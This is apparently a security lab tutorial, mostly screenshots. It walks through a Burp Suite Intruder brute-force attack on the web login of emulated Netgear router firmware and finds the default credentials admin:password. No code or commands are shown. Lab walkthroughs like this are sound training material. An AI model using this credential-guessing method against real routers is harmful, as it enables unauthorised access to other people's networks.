CRACKING AUTHENTICATION WITH BURP FOR NETGEAR ROUTER EMULATED FIRMWARE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMhyvui2AtSnI7yrFF54sW2vCZkRdzs_IZH3tp4s79HAaeTv50go3l5-0zyHk3q_DARxl9tgm4wQZ1hADhF6pKbgY4upTWTEmZRsk39_R5HvFZJ_ouu80-1yStAtme3iCEOz-3d2ptxeVL/s400/layout.jpg)
- This exercise is based in a previous emulation of Netgear firmware:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWg9VP_a4s2Y-7rRYxMiUf0YI3a4ZIj-ruBEGJvqCnMyPZIr-_Qc4snr6KvWzINRWzSI_yj37CTrawexR0SP-FmVEWcmTMd3dXyht8pOVxT08-T-pA_JvcZ0YWoBnLoGfwylJhjAbcjsFU/s640/screenshot.3.jpg)
- Downloading the free edition of Burp Suite in its .JAR file version:
https://portswigger.net/burp/freedownload
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxa-CYkFt6Esh-ywXBXnQX4MsSFPSp4C_-UoXNwkLZ0wR9PpbSp0q4mdUuRASluEHBtPtt3dFLEG9MH_uoQ5rZj145SiwJ1BCdCmxJTW_z8X0jodjxvdwp0VpTlYa-j88RpzavcybwnAsW/s640/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga05KJEWCnp6MRNwLERKGaOExF9KTihZvRMOnlS_t-oriQN6eRIEBO7XPADckuK-GQjVVXMibOccIt-aGX6fFaPMjhz0o-U68oavsjgGzQ77BJhF7sLm43P7BQ1SRTSLGSiV9QxnqkZtVk/s1600/screenshot.7.jpg)
- The .JAR file is downloaded:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZYa8LG9wkG9zNS0SorhSdR3LmMbYucwrTO1sDbXc-m7SvPNRWsmZfm9gea1FKgx8oAEqrj2NGR2QTEU_bED21ZGfOzqnSBf4lZM7iwKfXSyZ6B2GQ0NWNSn4kChl4Qw6zxBGfobbtw19n/s1600/screenshot.8.jpg)
- Launching the application:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9M-TosDHCvCZKvQE9Ec8iEbrvGGwpahLC0BWqVk0aeUQ2ZwrtD7RT7hk3kcLXgijRK4NUxlfzqKUTHaZ8BT8ab0Fkx1vdjHsod0LasDQdji4Wu2ns5lna9ydygjNFd5yYW4ip0nqa6M4y/s1600/screenshot.9.jpg)
- After accepting all the default options for Burp, let's ensure that the proxy is listening locally (127.0.0.1) on port 8080:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG9cVgXJfWO1mNDwPiodHk81iIvNyxDU2zlEhxBV0XgTN02lgNMpdi9acejjPM-4_ihGNapcNzqt1QufJbsLytTX77V3Z5VnHjTHOz93Z8bhPJAHa8i8scXf3sBpZAKQyDbiNwEQJuLJTz/s1600/screenshot.11.jpg)
- Also, let's configure Burp so that the interception applies for both the Client requests and the Server responses:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Xkgt8ZTrhtcufCvWDtcDlY2-jyJGhoLJcgI1gOu4_aESwF_I1RbN3lAWLovC6zX_sQ62iAyyTUQtA2zwiPkAbzcIcUaITzqR8jj3cXijUSjXV7eGFQ5tFfkWWidlCuI-VYPhQ2Iwrjis/s1600/screenshot.12.jpg)
- Now, it is time to enable the proxy at the Firefox browser:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhkjWJV_cQIvLJNrVjRHK3-dZm7saP0EOJ-sy9fhEN1ZuH441oUI_oMTWz7jwxGuk2kGcVsNIWcKSkm4KBosNGqvjoLI-TOJ0PcKhOPhL5x20DCDV6O2dr3U2KUbaCYnx5b15zgG0ZI_cT/s1600/screenshot.1.jpg)
- Let's introduce some fake credentials, like for instance Username:Password
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvXGQldnYVv4moO4ewHLr3X5N-0o0g_JHNIFyBKjgDGNLU4lPV471YugGF0eQlID6LeBZk4YZD7DT1V5AtKkWK536Zf9pqzpwdWMzKg3bHs4sguLgLMYCxm2z9Spmo4x4S7qxVmxt2_c5a/s1600/screenshot.8.jpg)
- Burp intercepts and displays the fake credentials:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjZ3S9k9D-_4J7Q23Qh_Th01aRCFQKQqbg_W3bCX6ZeJ-9WZK1MumcSGqsrqtbXLSEN2-WSb_4Ws2zISADDBVApepfARDK2L1T0TM6TDB_N3xY7myiGgketG91RT9xG-4CmV8sB4WJAl0i/s1600/screenshot.4.jpg)
- Looking into the tab "HTTP history", right clicking the request and choosing the option "Send to Intruder":
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT012pepCEwDp_U2UvwqMYaQhg4DG6CzdCOawkCRYEDomin1yLFayqIB5Z6R0Y_6lU0ALcWDpmGodB5hYYnzqR8CLZ1wp3-cet0XMzJDuWZ91bSrZurEXcgM9RQpWR7AUQvmkypV-NgK2h/s400/screenshot.19.jpg)
- The attack target is the known one (Firmware emulation with 192.168.0.100 and port 80):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsTN15XtCmBsEOP0lPgcdWlR-qUKXzU3irwr1qPlGkoOQ2MXkWsLOYg7Ma-96VuPWuseSyCxCAalUtLzkbOnrLxnFVVSMeNah2NVCh_SXWXDRivRLeuzgRMBwni4BrnTc76kpyyQlgBFoo/s1600/screenshot.20.jpg)
- The attack consists on using two payload lists, the first one for the username and the second one for the password:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbXCvQJXXO4YcAjoUn7M5pelvdfpWXd7a8Mtt9oV9CGKBPhxgDcz4PzInRBtTjNPX_vvAcR721jN_j6DBfgid78PA1F1oZp0Gt0bMd1GfubRHfKUI3t0fARk1mJbkdHR_GIWSK8CvaWFUd/s1600/screenshot.6.jpg)
- Because this is a simple example, let's provide just 10 possible usernames and 10 possible passwords, totally 10x10 = 100 possible requests.
- For the username (list of 10):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3RleK9XJJalQlhDXxOPaEZHVdV4y6SQGQu4il5CVktSI4ArsiQgJ7U_TOQb2ISGdUR7V7Gw8lf-2vbdm3mqCmhGO-7dTcKmHO64SC58pwywaCRdIAnmNmDGR-FZebI5nREiKe7QehZUae/s1600/screenshot.1.jpg)
- For the passwords (list of 10):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZM-5sRRd9xsRQfbQ2InGJ_kcQgRW1BNiwrNaEgwIdBuZ1Fh6viWxxbRGQ19WxedV4SxBOdZcMrTRoOcLfNLHYyYjsB6G3lebyVeI0nYCLqn_f5Rr157a1rD_tnVFCLrP2P2BAk1p_-9re/s1600/screenshot.2.jpg)
- As said before, in this simple case the total Request count is 100 (10x10):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNRXYGhzNlW5sFKMVUjriwb32qlvWPFB2sVq1ilWMIAVMXAT6ZNmWACskcAb6AMrTrpVi2FvU4tY9C7HqXMaNHhsEo__uajuKmvdmVg9GK_yCtu6qk_2z9t_axQ4HrFdxKcSQtH6S6CBKV/s400/screenshot.3.jpg)
- However, in a real scenario case, and using the Pro version of Burpsuite, large wordlist text files could be provided. Of course, trying many possible combinations would take a longer time to perform the attack:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh518rRglPS0g16Evxo9Jh2MYmtIA-04fYbnYT_dv46zyTnYWOW0w-FMEZ41-qyYcwVtVKXrclnVJKFEkeuyOHOKcea1XJgoRgiEgpr0YaY4CBV870CiUiKi6uuDdecanS-jdpyzM0R_I3r/s1600/screenshot.24.jpg)
- Starting the attack:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsoTfaenA0_1I83uz3Lxu-OxWrI-WliWf3ynrUMbsajXr0wANwyU3Xr1jep5t52B4XrUmqLCWS2mfTIrj5YKRb8LQgDZbUF-SzgY7qVIAMoCdpQNYy6wpKTZSVnKsJQAfHJbrPxTf5h-88/s400/screenshot.25.jpg)
- It is noticeable that the only trial (number 3) with a status 200 OK and different length (313) corresponds to admin:password, what are the default credentials for the NetGear device, meaning that the attack is successful.
- Also, the 3th trial yields a loginok response message:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-41S0V4B6ai9_uLMJvQPT_fxwtkrQNUwxvRNjM1YBvQP618E94i0KV7TXQMWOWbh-C6iLY4EYsrC01Pxe3oDu0AZvAcfk-zqRT8ZN7AiVwkHj2fCHpYn4gSrxZfnVVjsjwWh6tjFs_Hn4/s1600/screenshot.7.jpg)
- It is interesting to notice that this attack has been launched against an "emulated firmware", and not against an actual physical device.